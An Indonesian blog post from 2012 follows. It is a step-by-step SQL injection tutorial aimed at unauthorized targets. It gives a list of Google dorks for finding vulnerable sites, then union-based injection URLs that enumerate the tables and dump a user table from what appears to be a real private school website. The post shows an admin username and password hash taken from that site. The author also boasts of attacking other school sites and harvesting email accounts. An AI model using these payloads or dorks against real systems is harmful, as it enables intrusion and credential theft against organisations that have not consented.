Dalam hal ini dari pihak client, sehingga bila kita memodifikasi perintah-perintah sql akan terlihat langsung di browser.
Bahan:
1. Otomatis :
- schemafuzz.py
- python
2. Manual :
- Komputer.
- Akses Internet
- Target yang vulner
- Sedikit pengetahuan tentang md5
- Ketabahan dan kesabaran
Langsung dimulai aja.
wudhlu terlebih dahulu (biar yang kita lakukan jadi halal)
- Buka browser terserah IE to Firefox, kalo aq biasa pake firefox.
- Buka uncle google atau terserah buat ngesearch doank atau pake dork tools kalau punya.
contoh dork:
# SQL Injection Dork List #
index.php?option=com_mambads
inurl:index.php?option=com_expose
intitle:guestbook "advanced guestbook 2.2 powered"
filetype:asp inurl:"shopdisplayproducts.asp
"Powered by: vBulletin * 3.0.1" inurl:newreply.php
"Powered by Invision Power Board(U) v1.3 Final"
inurl:gotoURL.asp?url=
inurl:comersus_message.asp
ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input
inurl:"dispatch.php?atknodetype"
inurl:class.at
"Powered by Gallery v1.4.4"
inurl:/cgi-bin/index.cgi inurl:topics inurl:viewca
inurl:"/becommunity/community/index.php?pageurl="
"Powered *: newtelligence" ("dasBlog 1.6"
"dasBlog 1.5"
"dasBlog 1.4"
"dasBlog 1.3")
filetype:cgi inurl:tseekdir.cgi
filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages
viewpage
listcat)
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
intitle: Index of finance.xls
intitle:index.of passwd passwd.bak
allinurl:loc_id "mod.php?mod=calendar"
allinurl:"mod php mod publisher"artid
allinurl:"mod.php?mod=gallery" id
langkah 1:
- langsung di search aja, trus tinggal tunggu hasilnya'
- Untuk kali ini aku dapet dua target nie yang vurlner (sebenernya banyak sih, tapi males).
Langkah 2:
- masukan karakter "'" atau "-" (tanpa kutip) pada akhir url sampai terjadi error
contoh:
[target]/news_detail.php?idberita=-61
[target]/news_detail.php?idberita=61--
[target]/news_detail.php?idberita=61' atau
[target]/news_detail.php?idberita=61/* dan masih banyak lagi
sehingga muncul pesan error.
http://www.target.sch.id/news_detail.php?idberita=-61 (salah stu website sekolah swasta di Solo).
Langkah 3:
- Mencari tahu jumlah colom yang terdapat pada database website
menggunakan perintah: "order by"
contoh:
http://www.target.sch.id/news_detail.php?idberita=-61+order+by+1-- (chek satu per satu sampai terlihat perbedaan tampilan websitenya).
http://www.target.sch.id/news_detail.php?idberita=-61+order+by+2-- masih error
http://www.target.sch.id/news_detail.php?idberita=-61+order+by+3-- masih error
http://www.target.sch.id/news_detail.php?idberita=-61+order+by+4-- masih error
http://www.target.sch.id/news_detail.php?idberita=-61+order+by+5-- masih error
----
----
http://www.target.sch.id/news_detail.php?idberita=-61+order+by+9-- masih error
http://www.target.sch.id/news_detail.php?idberita=-61+order+by+10-- tidak error (atau kebalikannya).
berarti jumlah colomnya 8 buah
Langkah 4:
- mencari angka ajaib dengan menggunakan perintah union select
contoh:
http://www.target.sch.id/news_detail.php?idberita=-61+union+select+1,2,3,4,5,6,7,8,9--
keluar angka 2 pada website yang menjadi target tersebut
Langkah 5:
- Mencari versi dari sql yang digunakan database target menggunakan perintah @@version atau version().
contoh:
http://www.target.sch.id/news_detail.php?idberita=-61+union+select+1,version(),3,4,5,6,7,8,9--
eh ternyata versi 5.xx (alhamdulillah... ndak sia sia usahaku,,,)
bagi yang nemu versi 4 atau yang lain ndak usah berkecil hati,
ganti target baru atau pake blind sql injection. pake schemafuzz juga bisa (bagi para pemalas :D~ seperti aq)
lanjut...!!!!!!
Langkah 6:
- Mencari tahu table apa saja database yang terdapat dalam data base.
perintah table_name : dimasukan pada angka ajaib.
perintah +from+information_schema.tables-- : dimasukan setelah angka terakhir.
contoh:
http://www.target.sch.id/news_detail.php?idberita=-61+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables--
keluar table: tbpolling
langkah 7:
- Memunculkan semua isi yang ada dalam table tersebut.
perintah group_concat(table_name) : dimasukan pada angka ajaib.
perintah +from+information_schema.tables+where+table_schema=database() : dimasukan setelah angka terakhir.
contoh:
http://www.target.sch.id/news_detail.php?idberita=-61+union+select+1,perintah group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--
keluar:
komentar_madding,lulus,naikkelas,psb,tb_agenda,tb_alumni,tb_berita,tb_bukutamu,tb_ekstra,tb_forum,tb_guru,tb_header,tb_kategori,tb_kategori_ekstra,tb_kategori_guru,tb_kategori_kelas,tb_kategori_photo,tb_kelas,tb_komentar,tb_madding,tb_mata_pelajaran,tb_materi,tb_photo,tb_siswa,tb_skor,tb_soal,tb_user,tbjawabpolling,tbpolling
Langkah 8:
- Memunculkan isi table
perintah group_concat(column_name) : dimasukan pada angka ajaib.
perintah +from+information_schema.columns+where+table_name=0xhexa-- : dimasukan setelah angka terakhir
Contoh:
http://www.target.sch.id/news_detail.php?idberita=-61+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x74625f75736572--
0xhexa :convert an dari nama table ( pada kasus ini "tb_user" menjadi 74625f75736572)
silahkan tanya uncle google ajalah. Disini bukan tempat orang-orang manja!!!!!!!! googling sana!!!! lanjut!!!!
muncul user_id,username,user_pass,level,priv_halaman,nama,alamat,telp,photo1_status,last_visit,last_ip,status
Langkah 9:
- Memunculkan isi data dari colom tersebut
perintah concat_ws(0x3a,hasil dari isi column) >>> dimasukan pada angka ajaib
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir.
Contoh:
http://www.target.sch.id//news_detail.php?idberita=-61+union+select+1,concat_ws(0x3a,user_id,username,user_pass,level,priv_halaman,nama,alamat,telp,photo1_status,last_visit,last_ip,status),3,4,5,6,7,8,9+from+tb_user--
keluar deh:
:admin:AzFfblBjUWJTbQZv:10::Administrator::817897187:0:1256536540:125.163.200.15:1
username :admin
password :AzFfblBjUWJTbQZv
Tinggal di crack pake md5 decrypter, tanya uncle google lagi sono!!!!!
(sampai tanggal tutorial ini diposting aku belum bisa nemu decrypt dari passwordnya).
Setelah itu aku ganti target dah. tapi tetep....
website sekolah, tapi yang luar kota hehehe (dapet account yahoo banyak disini :D~).
jeleknya lagi password admin masih blum terpecahkan, kalo temen temen tau aku kasih tau ya!!!!!!!!!!
Langkah 10:
- MEncari halaman Login admin dan sign in sebagai administrator website tersebut.
Sabtu, 29 Desember 2012
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar